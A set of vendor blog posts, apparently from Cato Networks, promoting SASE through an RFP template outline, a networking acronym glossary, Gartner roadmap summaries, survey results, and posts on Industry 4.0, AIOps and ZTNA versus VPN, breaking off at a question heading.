This third section in the SASE RFP template covers all the capabilities that will improve your network and security. You can pick and choose which capabilities you need now, but make sure your SASE vendor can expand to cover any additional needs you will have in the future.
Capabilities to discuss:
SD-WAN - discuss link management capabilities, traffic routing and QoS, managing voice and latency-sensitive traffic, supported throughputs and edge devices, monitoring and reporting capabilities, how site provisioning works, and rollout strategies.
Security - understand how traffic is encrypted, which threat prevention and threat detection capabilities are available, how branch and cloud security are implemented, how mobile users are secured, which identity and user awareness systems are incorporated, how policies are managed and enforced, and which analytics and reporting capabilities are provided.
Cloud - Which components are provided, which integrations are included and how traffic is optimized.
Mobile - How mobile users are connected to the network while optimizing and securing traffic, and if ZTNA is provided.
Global Connectivity - How traffic is optimized and latency is reduced from site to site and across the internet.
Pro tip: Ask the vendor to weigh in on which capabilities can answer your business goals.
4. SASE Support and Services
This fourth and final section of the SASE RFP template is about the relationship between you and the vendor after implementing SASE. It includes the co-management and maintenance of the project, what happens if things go wrong, and how you can make changes after rollout.
Discussion points include:
Support and professional services - When and how support is provided, what the SLAs are and which professional services are available.
Managed services - which services are provided, what the different packages are, co-management capabilities, what is available through self-service and outsourcing options.
Pro tip: Ask to speak with existing customers who’ve used support services to find out how the vendor deals with issues.
Next Steps for Finding a SASE Vendor
SASE provides IT managers and network and security teams with a converged, simplified solution that replaces all existing point solutions. However, it’s important to choose the right vendor. A good SASE vendor will answer all of an organization's existing and future needs.
Take your time to discuss all the points from above with the vendor, until you’re confident that your employees’ needs will be answered and the business can continue to grow without network and security frictions.
The discussion points in this blog post are based on a more comprehensive RFP template prepared by Cato Networks. You can get the full template free of charge here.
23 Good-To-Know Networking Acronyms and Abbreviations
You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation.
Secure Access Service Edge (SASE) converges network and security functionalities into a single cloud-based solution. SASE merges the network optimization capabilities of SD-WAN with a full security stack, including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more. According to Gartner that coined the term, SASE is “the future of network security.”
Software-Defined Wide Area Network (SD-WAN) is a virtual WAN architecture offering optimized traffic routing over multiple types of media (broadband, MPLS, 5G/LTE, etc.). By choosing the best available path, SD-WAN provides better performance and reliability than broadband Internet. Keep in mind, however, that unless SD-WAN is deployed as part of SASE, it can’t support global connectivity, network optimization, WAN and Internet security, cloud acceleration, and remote users.
Multiprotocol Label Switching (MPLS) routes traffic over telecommunications networks using short path labels instead of longer network addresses. MPLS improves the performance and reliability of traffic flows, yet remains an expensive, rigid solution with limited capacity.
A Point of Presence (PoP) is an access point to a network, such as a SASE or SD-WAN appliance. Traffic can enter and exit these networks via a PoP. According to Gartner, many emerging edge applications require “a cloud-delivery-based approach, favoring providers with many points of presence (POPs).”
Source: Market Trends: How to Win as WAN Edge and Security Converge Into the Secure Access Service Edge, 29 July 2019, Joe Skorupa, Neil MacDonald
Virtual Private Network (VPN) solutions provide an encrypted link between a network and a remote user or network. Traffic sent over the VPN acts as if the remote device is directly connected to the network with full access to corporate resources. Enterprises that have traditionally relied on VPN are realizing that it’s poorly suited for the shift to the cloud and work-from-anywhere reality, as it lacks granular security, global scalability and performance optimization capabilities.
Unified Communications (UC) is the integration of corporate communications services, such as voice, messaging, videoconferencing, etc. UC creates a consistent user interface and experience across multiple communications media but requires a high-performance, reliable, and geographically distributed network.
Unified Communications as a Service (UCaaS) is a cloud-based delivery model for UC. With SASE, UCaaS traffic is optimally routed to the UCaaS provider instance, and UC/UCaaS components connected to a SASE Cloud are protected against network attacks without requiring additional security solutions.
Quality of Experience (QoE) measures how network performance impacts the end user. QoE takes into account the fact that some performance issues may have a negligible impact on application performance while others render an application unusable. For example, SASE provides a higher QoE than VPN for cloud-based applications by eliminating the need to backhaul traffic through the enterprise network.
Policy-based Routing (PbR) routes network flows based on policies defined by a network administrator. It can provide priority to certain types of traffic or allow it to use more expensive routes, such as MPLS circuits. SD-WAN and SASE solutions offer PbR functionality.
5th generation mobile networks (5G) are the most recent generation of cellular networks. They offer higher speeds and support higher densities of devices than previous generations. SD-WAN and SASE solutions often connect to 5G networks to provide increased resiliency.
Artificial intelligence for IT operations (AIOps) uses machine learning and big data to improve IT operations. AIOps enables automated data processing, decision-making, and response for IT operations. A SASE architecture enables businesses to realize the full potential of AIOps, allowing IT to focus on valuable business objectives such as user experience, revenue, and growth.
Voice over IP (VoIP) enables voice communications over broadband Internet. Telephony data is encoded in network packets and sent over the Internet to its destination rather than traditional phone networks. Like UC solutions, VoIP requires high-performance, reliable, and geographically distributed networks.
Content Delivery Network (CDN) is a geographically distributed network of servers that serve cached copies of web content. CDNs improve a website’s performance by moving the service closer to end users and decreasing the load on the origin server.
Network as a Service (NaaS) is a delivery model for cloud-based networking services. With NaaS, a company can deploy and manage its own networks using infrastructure maintained by its service provider. SASE is an example of a NaaS offering because SASE PoPs provide all required network services in a cloud-based appliance.
Internet Service Providers (ISPs) provide their customers with access to the Internet. In addition to Internet access, ISPs may also offer other services, such as email, web hosting, and domain registration.
Universal Customer Premises Equipment (uCPE) is a general-purpose off-the-shelf server, including compute, storage, and networking. uCPEs provide network and security services using network function virtualization.
Network Function Virtualization (NFV) provides network functions using virtualized services rather than dedicated appliances. This enables these functions to be provided using uCPEs or cloud platforms rather than expensive, dedicated infrastructure.
Virtual Network Functions (VNFs) are virtualized network services that replace dedicated hardware appliances. VNFs can be linked together using service chaining to create more complex functionality. The use of VNFs and service chaining is common among providers of SASE alternatives that lack the service convergence of SASE.
Software-Defined Networks (SDN) decouple the control plane from the forwarding plane. The network is defined and managed in software, making it more flexible and adaptable. SD-WAN and SASE are examples of SDN applied to the corporate WAN.
Local Area Networks (LAN) link computers together within an organization. A LAN is connected to the Internet via one or more ISPs.
The Border Gateway Protocol (BGP) is a protocol for exchanging routing information between different autonomous systems (ASes) on the Internet. Each AS advertises which IP addresses it can route traffic to, helping traffic move from its source AS to the AS closest to its destination.
The Open Shortest Path First (OSPF) protocol is designed to route traffic within an AS. It uses Dijkstra’s algorithm to find the shortest route to its destination, minimizing the distance that the traffic needs to travel and hopefully the latency as well.
The Domain Name Service (DNS) is the “address book” of the Internet. DNS servers translate domain names (like catonetworks.com) to the IP addresses used by computers to route traffic.
While these are some of the most common and important acronyms in networking, this is far from a complete list. To learn more about how modern networks work, read more on the Cato Networks blog.
Understanding the 2021 Strategic Roadmap for SASE Convergence
In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving them to the cloud, SASE meets the needs of the modern digital business.
In March, Gartner published this year’s 2021 strategic roadmap for SASE convergence, which details how organizations can transition from legacy security architectures to fully integrated SASE deployments. I highly recommend that you check out the report for yourself as it provides a clear and compelling vision for organizations looking to start or continue their journey to SASE.
Architectural Transformation is Driving SASE Forward
Gartner’s claim that SASE is “the future of network security” is based on the fact that corporate networks and infrastructures are evolving and legacy security solutions are not keeping up. In the past, companies could rely on a patchwork of perimeter-based security solutions to protect corporate assets located in on-premises data centers against attack.
The modern enterprise has moved many or all of its IT assets to the cloud to take advantage of the increased flexibility and scalability that it provides. As the traditional network perimeter dissolves and organizations move more quickly, security must become software-defined and cloud-delivered to effectively protect organizations against evolving threats.
Attempting to protect the modern enterprise with a legacy security architecture is unscalable and inefficient. The average organization has dozens of standalone security solutions to configure, monitor, and maintain, often with lean security teams. As a result, many organizations struggle to secure their existing infrastructure let alone securely adapt to changing requirements, such as the adoption of work from home or hybrid work models as a result of the COVID-19 pandemic.
As organizations' infrastructure and business needs evolve, they require modern SASE Architecture to meet their security requirements. Some of the main SASE Benefits to the modern enterprise include:
Solution Integration: SASE includes a full network security stack.
Cloud-Native Security: SASE is hosted in the cloud, making it well suited to securing distributed organizations and cloud-hosted applications.
Flexibility: As a cloud-native solution, SASE offers greater scalability and lower cost than appliance-based solutions.
Network Optimization: SASE solutions include SD-WAN network optimization over encrypted links between SASE PoPs (points of presence).
Short Term Solutions and Recommended Deployment of SASE
The goal of Gartner’s strategic roadmap for SASE adoption is to help enterprises make the move from legacy security architectures to SASE. In many cases, existing commitments and limited resources make it impossible for these organizations to make the jump all at once. Gartner breaks the process into manageable steps to help organizations work through the process.
Gartner defines a number of short-term goals for organizations making the move to SASE. These goals include:
Deploying Zero Trust Network Access (ZTNA): With the rapid growth of remote work, replacing legacy virtual private networks (VPNs) for remote users is a major priority. The ZTNA capabilities of SASE make it a more secure alternative to legacy remote access solutions that allows organizations to implement their zero trust strategies to better protect their data and users.
Creating a Phase-Out Plan: Gartner recommends performing a complete equipment and contract inventory and developing a timeline for phasing out on-premises perimeter and branch security appliances. These solutions can then be replaced with SASE capabilities hosted in the cloud.
Consolidating Vendors: SASE offers complete integration of a wide range of security capabilities, eliminating the need for standalone solutions from multiple vendors. Making the switch to SASE simplifies and streamlines every aspect of security from solution acquisition to long-term monitoring and maintenance.
Performing Branch Transformation: Security appliances deployed at each physical location create a complex and sprawling security architecture. Moving these functions to the cloud centralizes and simplifies an organization’s security.
In addition to these short-term goals, Gartner also outlines a number of long-term goals that an organization should pursue. These largely focus on taking advantage of the security integration and ZTNA capabilities of SASE to centralize and streamline security operations across the enterprise.
Achieving even these short-term goals can be a significant milestone for an organization. Most companies will need to develop a multi-year strategy for making the move to SASE. While this strategy will differ from one company to another, Gartner makes one recommendation that applies across the board: start the process today. To learn more about how to start your transition to SASE, don’t hesitate to contact us or request a demo today.
Work from Anywhere Survey Finds Dramatic Increase in IT Cost
The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely.
However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were found to be spending more time supporting the remote workforce since the pandemic outbreak. 47% of participants experienced an increase of at least 25%, and 16% of participants suffered from an increase of over 50%.
Continued IT Challenges
The rapid transition to remote work created a scramble as enterprises tried to suddenly set up remote workforces. And, over a year later, companies are still struggling to effectively support remote work.
One of the primary challenges for enterprises is effectively securing their remote workforce. Nearly half of the respondents say they can’t provide the same level of security to remote users as in the office. This leaves the enterprise vulnerable to phishing and other Internet-borne attacks.
A significant driver of this is the reliance on legacy solutions for secure remote access. Early in the pandemic, the limitations of virtual private networks (VPNs) became plain as a massive increase in remote workers overloaded existing infrastructure. In response, companies adopted workarounds that unfortunately sacrificed enterprise security for performance.
Working from home also has a significant impact on employee productivity. Issues with VPN infrastructure mean that remote users have unstable connections to the corporate network. Additionally, 30% of the respondents claim that application performance is worse when working remotely compared to working from the office. Without the necessary infrastructure to support them, remote workers are not able to perform at their full potential, which hurts the business and its bottom line.
How the Hybrid Working Model Impacts IT
Issues with network connectivity and application performance create additional work for corporate IT departments. The shift to work from anywhere means that support requests, and the time spent on addressing them, have increased dramatically.
The biggest issue faced by IT due to the shift to remote work is that employees no longer have stable, high-performance access to corporate resources. The complexity of addressing these problems has also grown by orders of magnitude. In the past, IT was responsible for ensuring that each branch location had reliable, high-speed access to corporate assets. Now, IT must provide the same guarantees to employees that could be working from anywhere.
The shift to the new hybrid working model has created significant costs for organizations. Poor network and application performance affects employee productivity. And IT, focused on addressing support tickets, lacks the time and resources for infrastructure upgrades and other tasks. Many enterprises have already experienced the increased costs associated with work from home, but may struggle to quantify them.
SASE Gives Enterprises Adaptability
The high costs of work from anywhere stem from the fact that companies are using legacy technologies to support their remote workers. Secure Access Service Edge (SASE) enables the distributed enterprise to achieve the security and performance it needs in a sustainable and scalable way.
SASE converges SD-WAN, network security, and Zero Trust Network Access (ZTNA) into a global, cloud-native service. It optimizes and secures application access for all users and locations. Enterprises that had already adopted SASE were prepared for the pandemic and are ready for the new work from anywhere reality. Employees could connect from anywhere and have their traffic optimally and securely routed to corporate resources.
More enterprises are adopting SASE, which is a positive indication that the industry is moving in the right direction, the SASE direction. In January 2021, 19% were actively planning for a SASE deployment in the next 12 months. Just six months later, this number has increased by more than 10%. In January 2021, only 27% were considering SASE, and six months later, over 40% indicated they were considering SASE.
Post-COVID, work from anywhere is here to stay. Contact us and request a demo to learn how to reduce costs and IT service requests and better support your distributed workforce.
5 Steps to Prepare for SASE Adoption
Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up.
Secure Access Service Edge (SASE) offers security designed for the modern enterprise, including native support for remote work. SASE combines networking and security functions into a single cloud service. This combination not only improves the security of the network but makes it faster and more scalable as well.
In recent years, I’ve seen a surge of interest in SASE as organizations start looking for ways to upgrade their infrastructure to support their remote workforce and achieve their goals of implementing zero trust security. However, adopting SASE means that an organization needs to make major changes in how its network operates and is secured. Below are five steps to help you make your SASE adoption process as smooth and painless as possible.
#1. Know your Users and their Applications
When planning your SASE migration, it’s important to keep your users in mind. Every organization has a unique user base, and these users and their needs will determine the required configuration for SASE. If you don’t know how your IT environment is used on a daily basis, it is much harder to secure it.
One of the core benefits of SASE is its support for zero trust security, which requires access controls to be defined based upon business needs. Understanding the structure and use cases of your IT environment is essential for ensuring a smooth migration to SASE and building effective test plans to verify services post-cutover.
#2. Know your Security Policies and Regulatory Compliance Obligations
In recent years, the regulatory landscape has exploded. New laws like the EU’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) add further obligations and security requirements for organizations. When designing your SASE Architecture, it’s important to keep these regulations and corporate security policies in mind.
With the recent rise in remote work, it is essential to ensure that your SASE solution is properly set up to support a secure remote workforce. This includes configuring ZTNA/SDP to provide remote access to corporate resources while maintaining compliance with data protection regulations and corporate security policies.
#3. Prepare for the Unknown and Unexpected
The primary goal of SASE security is to simplify and streamline security by consolidating multiple functions into a single service. This enables security teams to have full visibility into their network architecture.
With this increased visibility comes the potential to discover previously unknown security issues within an organization’s IT environment. As you make the migration over to SASE, be prepared to investigate and remediate previously unknown issues, such as security breaches, poorly performing Internet circuits, shadow IT services, and unintentionally permitted traffic flows.
#4. Bring in the ‘A-Team’
A migration to SASE is a complete overhaul of an organization’s IT and security infrastructure. SASE replaces legacy security appliances with a cloud-based, fully-integrated solution. When making this transition, it is vital to engage all stakeholders in the process. This includes internal IT, external contractors, channel partners, MSPs, etc.
By bringing in all of these parties from the very beginning, an organization ensures a smoother transition to SASE. Stakeholders can identify and plan for use cases and business needs from the beginning rather than discovering them later in the process.
#5. Get Ready for Things to Get Better
After making the move, your organization will be able to take full advantage of the benefits of SASE. SASE optimizes both networking and security infrastructure, meaning that your environment will not only be more secure but more agile and efficient as well.
After migrating to SASE, IT will also be freed of the tedious and time consuming maintenance of disparate point solutions, freeing up their time to focus on core business needs.
The Road to SASE Starts Here
If you’re just starting out on your SASE journey, I recommend checking out SASE for Dummies book, which provides a solid grounding on SASE and its benefits to the organization. From there, you can pursue a SASE Expert Certification and build the skills that you will need to effectively implement SASE within your organization.
New Gartner Report: 2021 Strategic Roadmap for SASE Convergence
Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that can be partially or fully implemented today.” And, enterprises should build a strategy for replacing legacy point products with a converged SASE platform.
The migration to SASE will enable enterprises to successfully address the current and future networking and security challenges:
Shifting to cloud-delivered security to protect anywhere, anytime access to digital capabilities
Simplifying security management that has become complex due to multiple vendors, policies, and appliances
Reducing cost with MPLS replacement and SD-WAN alternative projects
Better utilizing resources and skills to overcome organizational silos and facilitate growth
Practical Advice to Follow
Gartner analyzes the gaps between the future and current state of SASE offerings, and provides a strategic roadmap, migration plan, and advice on SASE adoption over the next five years.
Short term recommendations:
Deploy ZTNA/SDP to replace legacy VPN for the remote workforce
Implement phase-out tactics for on-premises hardware in favor of SASE services
Reduce cost and complexity by leveraging converged offerings of SWGs, CASBs, and VPN
Initiate branch transformation projects to integrate cloud-based security services
Consolidate SASE offerings to a single vendor or two explicitly partnered vendors
Implement ZTNA/SDP for all users, at all locations
Prefer SASE offerings that allow you to control privacy and compliance related matters
Create a sassy team of networking and security experts responsible for secure access across all edges
Strategic Assumptions to Consider
The report brings new statistics and understandings of market trends, naturally accelerated by the global crisis.
By 2024, 30% of enterprises will adopt cloud-delivered SWG, CASB, ZTNA, and FWaaS from the same vendor, up from 5% in 2020
By 2025, 60% of enterprises will have explicit strategies and timelines for SASE adoption, up from 10% in 2020
By 2023, to deliver flexible, cost-effective scalable bandwidth, 30% of enterprises will have only Internet WAN connectivity, up from 15% in 2020.
Industry 4.0 – Talking About a Revolution
The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing.
In an Industry 4.0 world, supply chains are completely visible and workflows are fully automated. Factories, machines, products, and processes are all smart; all connected; and all sharing data to better serve today’s sophisticated customers. This revolution is basically the digital transformation of manufacturing, with clear benefits that include better security, reduced cost, customer satisfaction, competitive differentiation, and more.
Industry 4.0 was first introduced in 2011, so why all the buzz 10 years later?
You guessed right, it’s none other than COVID-19 accelerating the revolution. According to Gartner, by 2024, following the pandemic, over 30% of manufacturers driving Industry 4.0 programs, will change their business models compared to 10% before the pandemic. This is because manufacturers will come out of the crisis knowing they must adapt to a changed environment, with different user preferences, new processes, and flexible workplace models.
And the pressure is on you to manage and control this new
Are you in a Position to Join the Revolution?
Gartner advises manufacturers to take into account disruptions such as COVID-19 and “overcome impending crises with the least possible damage, and to be better prepared for any kind of downturn or even cyclical crises in the future.” Yet with today’s legacy WAN architecture, following this advice is easier said than done, and overcoming unexpected challenges with the “least possible damage” sounds like mission impossible (minus Tom Cruise and the happy ending).
Gaining business value through the ability to converge the digital and physical environments is the essence of Industry 4.0. However, the potential of this revolution can’t be realized with an outdated, fragmented network infrastructure.
Current networks were never designed to support the fundamental requirements of security, flexibility, availability, and resiliency Industry 4.0 demands. Too many manufacturers are stranded with legacy MPLS-based networks, and IT has no effective way to gain visibility across systems, locations, processes, and users; and extracting actionable data becomes close to impossible. Perhaps this is one of the reasons why Gartner predicted that by 2021 only half of all Industry 4.0 transformation initiatives would be successful.
The Cost of Being Left Behind
Let’s examine one of the essential requirements for leveraging Industry 4.0 – continuous availability. According to ITIC’s recent report, 8 out of 10 enterprises require a minimum of 99.99% uptime for their mission critical systems; and 2 out of 10 enterprises request at least 99.999% availability. These expectations may seem high, but in the context of Industry 4.0, they’re necessary and justified.
The business damage from downtime affects enterprises of all sizes and verticals. In 2020, 98% of enterprises indicated that the hourly cost of downtime was more than $100K; and for 34%, the cost reached $1M! Considering the volume of processes and systems manufacturing includes, just one hour of downtime entails significant loss to the business.
Any trouble with your network could translate into damage to production, loss of data, and negative impact on your brand reputation.
As smart manufacturing continues to evolve, manufacturers must adapt to, and keep up with, changes (both predicted and unpredicted). From IT’s perspective, this calls for a network that enables them to seamlessly and securely support new technologies as they’re introduced, alongside ensuring constant connectivity to everyone, everywhere. Without this, IT won’t be able to support Industry 4.0 projects and manufacturers will find themselves out of the game.
A Smart Factory Calls for a SASE Network
To empower manufacturers to emerge stronger from the global crisis and deliver on the promise of Industry 4.0 – a new (and smart) network is needed. A network that provides the underlying mission critical infrastructure that can support Industry 4.0 technologies. Fortunately, this network already exists. It’s called Secure Access Service Edge (SASE) and is considered by Gartner to be transformational and the future of network security.
SASE converges SD-WAN and network security into a single cloud service, delivering a uniform set of security and optimization capabilities, connecting all users, equipment, and locations. A SASE platform is cloud-native and its service is delivered through a global private backbone, supported by numerous distributed PoPs.
With SASE, IT can eliminate MPLS, deliver optimized performance, maintain a strong security posture, ensure 99.999% availability, and natively support new digital technologies.
Global private backbone ensures IT can connect all enterprise resources over high-speed Internet without compromising on availability or network performance.
Enterprise-grade Security as a Service provides a consistent level of security across all edges, which is simple to manage even by small IT teams.
Built-in ZTNA/SDP guarantees employees continue working from remote without any compromise on performance and productivity; and even in crisis mode – business continues as usual.
Cloud-native integration helps migrate data and applications to the cloud with minimal risk and effort, while eliminating or avoiding the high cost of private cloud connections like Azure ExpressRoute or AWS Direct Connect.
A true SASE network will ensure you can respond better to business needs, deploy workplaces of any kind faster, and enable the Industry 4.0 transformation to support your modern global manufacturing business.
Pre or post COVID-19, the fourth industrial revolution touches upon enterprises of various types, sizes, and locations, all sharing the same challenge: how to embrace new technologies that support both current and future needs while justifying the related investment. Manufacturers that succeed in leveraging new technologies will be able to improve business operations, create new value, prevail over the global crisis, and be ready for the unexpected; be ready for the new normal.
We’re in the midst of this revolution, and the question to be asked is not will your business be disrupted, but rather when will your business be disrupted, and how can you ensure your underlying network infrastructure is adequate to support the Industry 4.0 journey and create value for your company.
Gartner’s Predicts 2020: Resilience in Industrie 4.0 for Advanced Manufacturing Builds on Data and Collaboration Models, ID G00465232
ITIC 2020 Global Server Hardware, Server OS Reliability Survey
Putting AIOps with SASE to Use
Note: This is the second post following AIOps and SASE – A Match Made in the Cloud.
The introduction of SASE to the market is enabling enterprises to realize the potential of AIOps, bringing IT operations to a whole new level. Let’s recall the three qualities of AIOps Gartner defined: observe (gathering and monitoring data); engage (understanding and analyzing the data); act (automating actions and responding to problems). SASE improves all these qualities, creating use cases with a clear impact on the business. Here’s how:
1 – Observe Use Case: Intelligent Alerting
Technologies come and go, but data is here to stay. And the volume of data is only increasing, with alerts pouring down noisily on IT. IDC predicts that by 2025, data will grow by 61% reaching 175 zettabytes(!) of data worldwide. Now that’s a lot of data…
Even if IT uses AIOps techniques somehow, without the right network architecture, there’s no intelligent way to gather and monitor massive amounts of data. On top of the challenge of collecting and inspecting data, Computer Weekly recently discussed the struggle IT leaders have with the increasing volumes of alerts, where 99% claim that this is causing problems for their teams, and 83% admit their IT staff is suffering from alert fatigue.
Elad Menahem, our Director of Security, explains this well: “Security analysts face a daily flood of security alerts most of which are simply irrelevant. These false positives result in alert fatigue that leads security professionals to block access to legitimate business resources or simply disable their defenses, increasing the risk of infection.”
We all know the undesirable result of the boy who cried wolf. This is where AIOps with SASE can make a difference. A SASE vendor gathers and stores all data in a big data repository. With full visibility into the entire network, the SASE vendor then provides ongoing monitoring of all traffic, using AIOps to make sense of the data and alerting IT only when needed. Mostly, not alerting IT when it’s not needed. Intelligent alerting reduces alert fatigue and helps IT prioritize attention to what matters most.
2 – Engage Use Case: Root Cause Analysis
Gathering and monitoring data is just the beginning; IT also needs a way to analyze the data in order to find the root cause of a problem. In today’s complex, fragmented network environment, finding the root cause is complex accordingly. A problem can originate from a specific issue or device, or stem from several different events together, but there’s no effective way of uncovering the source within a fragmented architecture.
With SASE complexity goes away. IT can easily view past alerts in a focused context without any noise. Pinpointing problems becomes simple, quick, and accurate. In addition, real-time monitoring provides immediate visibility into the entire network, enabling IT to determine if a problem persists or not.
IT can also receive alerts together with an analysis explaining why a specific conclusion was reached. This allows IT to further investigate the root cause of a problem and provide input that feeds the AI/ML engine, optimizing detection and analysis capabilities moving forward.
3 – Act Use Case: Proactive Incident Detection
Intelligent alerting and root cause analysis facilitate accurate and effective response. AIOps with SASE delivers automated notifications to IT regarding incidents that need attention. Anomaly detection capabilities can alert IT of irregular, suspicious network behavior, so that IT is aware of any potential trouble. This accelerates remediation capabilities with a workflow process that’s already in place, calling for IT intervention only if and when needed.
AIOps with SASE enables IT to adopt a proactive approach to problem detection, adding optimization rules, fine-tuning alert thresholds, tightening security, and so on. Rather than merely reacting to incidents, IT can now predict problems even before they occur, ensuring seamless user experience and directing resources to core business initiatives.
Next Great Leap for IT
AIOps utilizes AI/ML to help IT manage networking and security effectively, in a way that truly supports the digital business. Enterprises that have already implemented SASE as their underlying network will be able to realize the full potential of AIOps, moving past the typical IT benchmarks of uptime and availability.
A SASE network supports a closed feedback loop, where IT can easily see the effectiveness of their actions, way before hearing about a problem from an annoyed end user. Guesstimating, hoping, and praying, are replaced with monitoring, understanding, and acting accordingly. AIOps with SASE empowers IT teams of the future to focus their efforts and skills around the most significant business metrics such as user satisfaction, revenue generation, and growth acceleration.
AIOps and SASE – A Match Made in the Cloud
Imagine handling a vacation booking at The Venetian without the right hotel management software. It’s hard to even picture the time, effort and resources needed for basic actions like verifying a room’s availability, knowing when a room is clean for early check-in, granting guests independent access to hotel facilities without key cards, calculating the cost at check-out, etc.
Now picture an IT team equipped with legacy tools, trying to manually control an enterprise network in a multi-cloud environment, with physical datacenters, global branches, numerous employees working from everywhere and on any device, and huge volumes of data constantly being generated. Sounds out of control...
The analogy is clear: Just like The Venetian can’t be managed like a small inn from the previous century, today’s IT Operations (ITOps) can’t be effectively run with traditional tools designed for a different type of network, and different era. The needs of today’s digital business – especially with a global crisis in the background – call for some heavy-duty automation.
According to Gartner, the notion of ITOps becoming smarter and “independently” automated, is already here and available. And it’s called AIOps.
AIOps to the Rescue
The objective of Artificial Intelligence for IT Operations (AIOps) is to empower IT to regain control of network and security in today’s complex, challenging environment via artificial intelligence (AI) and machine learning (ML) techniques that automate ITOps. AIOps continuously learns the patterns of an enterprise’s network, operations, and remediation actions in order to expedite and improve processes, decision making, and overall business performance.
The effect of AIOps is across the board, resulting in highly productive employees, happier customers, and better bottom line. Gartner defines Artificial Intelligence for IT operations (AIOps) as “the application of machine learning and data science to IT operations problems,” and predicts that exclusive use of AIOps for monitoring applications and infrastructure will rise from 5% in 2018 to 30% in 2023. In fact, according to Gartner “the long-term impact of AIOps on IT operations will be transformative.”
Transformative is a word with great significance. As is the word transformational used by Gartner to describe SASE. Is it merely a coincidence that today’s hottest subject – SASE, and AIOps, share the similar quality of being so impactful on the network and security industry? And what makes AIOps worthy of such a title? Let’s find out.
Transforming the Way IT Manages Enterprise Assets
When faced with network issues that need to be addressed, IT must identify what the problem is, but just as important, IT needs to understand how the problem can affect the business. Understanding this is crucial for moving from a reactive mode to a proactive mode.
With AIOps, the process of pinpointing and addressing a problem can be done on the spot, and many times even before the problem occurs. For example, preventing performance degradation or mitigating outages so that the customer experience isn’t affected. This is where AIOps brings ITOps to a whole new level.
How does this magic happen? Gartner defined three major qualities of AIOps:
Observe: Gathering and monitoring data.
Engage: Understanding and analyzing the data.
Act: Automating actions and responding to problems.
By analyzing the data from AI/ML based platforms, IT extracts accurate, actionable insights to automatically detect and respond to problems in real-time, and ahead of time. Analysis and decision-making are “offloaded” to an artificial brain that is able to process data, identify threats, make correlations, alert, and respond faster and more accurately than the manual brain.
AIOps with a SASE Twist
To truly deliver on the transformative promise of AIOps and reap the benefits, the right underlying infrastructure is needed. This means a transformational network infrastructure that enables visibility into all of the enterprise’s data, alongside the ability to deliver continuous insights across all IT platforms and tools.
Full network visibility is dependent on a converged, cloud-native architecture. And Gartner’s Secure Access Service Edge (SASE) is exactly that: the convergence of all networking functions and security into a unified cloud service, based on edge identity, combined with real-time context, and security policies.
Unfortunately, a network built on disparate point solutions with traditional technological silos can’t utilize AIOps to its full potential. In today’s complex network environment, the root cause of a problem can stem from various factors or a combination of several. It can be a problem in a specific branch or cloud datacenter, or related to a service or an event; it can be a problem at the network level, the application level, or device-related. And if AIOps is dependent on a fragmented infrastructure, finding, remediating, and preventing a problem becomes extremely challenging and significantly less effective.
The Great Responsibility that Comes with AIOps
On a personal note, and unlike a vendor offering boxes, we talk from experience when we say that delivering on the promise of AIOps comes with the great responsibility of having to act quickly and accurately without negatively affecting the customer.
Being the first true SASE vendor means that our infrastructure affects our many customers, and there’s no room for mistakes. This is why we built a global private backbone of 60+ PoPs, with self-healing capabilities that ensure ongoing, uninterrupted service. Our SASE platform enables us to implement the three requirements of Gartner for AIOps:
Gathering and monitoring data, stored in our big data repository (observe).
Applying AI and ML algorithms to understand and analyze the data and identify the root cause of a problem (engage).
Preventing and responding to problems automatically and accurately (act).
With SASE as the underlying network, customers benefit from AIOps without having to plan complicated strategies, make adjustments to their infrastructure, or hire AIOps experts.
AIOps presents a real boost to the modern digital business. We recognize this. Customers realize this. It’s exciting! But AIOps is too huge to cover in one blog post. Stay tuned for future posts, where we’ll share real stories, and explain the magic behind the SASE-based AIOps use cases.
SDP/ZTNA vs. VPN
Once Upon a VPN...
In today’s challenging reality, remote access has become a basic requirement for businesses of all kinds, sizes, and locations. An enterprise’s ability to shift to a work-from-anywhere model instantly, securely, and at scale, will determine how it will weather the COVID-19 crisis.
A common way to provide remote access is with VPN; and enterprises naturally assumed they could extend their VPN solutions to keep up with evolving business needs, continuous security challenges, and the sudden explosion of remote users.
To find out if this assumption is true, let’s answer the following five questions:
1. Is VPN still relevant?
Over two decades ago VPN was the technology for providing secure remote access to the Internet. And at about the same time, the Motorola StarTAC was the mobile phone available in the market… So yes, while VPN was once the best remote access solution for the business, it no longer is.
The modern digital business of today works differently and requires a new approach to remote access. An approach that enables capabilities such as granular security, global scalability, and optimized performance. Yet, VPN fails to address these capabilities.
VPN doesn’t enable granular security policies. Instead, VPN provides users with a secure connection to the entire network, rather than to specific applications. This expands the attack surface and badly affects the enterprise’s security posture.
VPN was never designed with the purpose of delivering all users, at all locations, immediate and ongoing connectivity to enterprise applications. However, in a work-from-anywhere environment, this is exactly what’s needed; and VPN’s inability to support global scalability results in slow response time and negative impact on employee productivity.
Optimized performance isn’t supported by VPN as it relies on the unpredictable Internet. This means that for global access, IT needs to backhaul traffic to a VPN server in a datacenter and then to the cloud, adding latency to the VPN session and resulting in poor performance.
Simply put, if VPN doesn’t address the security, scalability, and performance needs of the business as it functions today, how relevant can VPN still be?
2. Can SDP address VPN’s limitations?
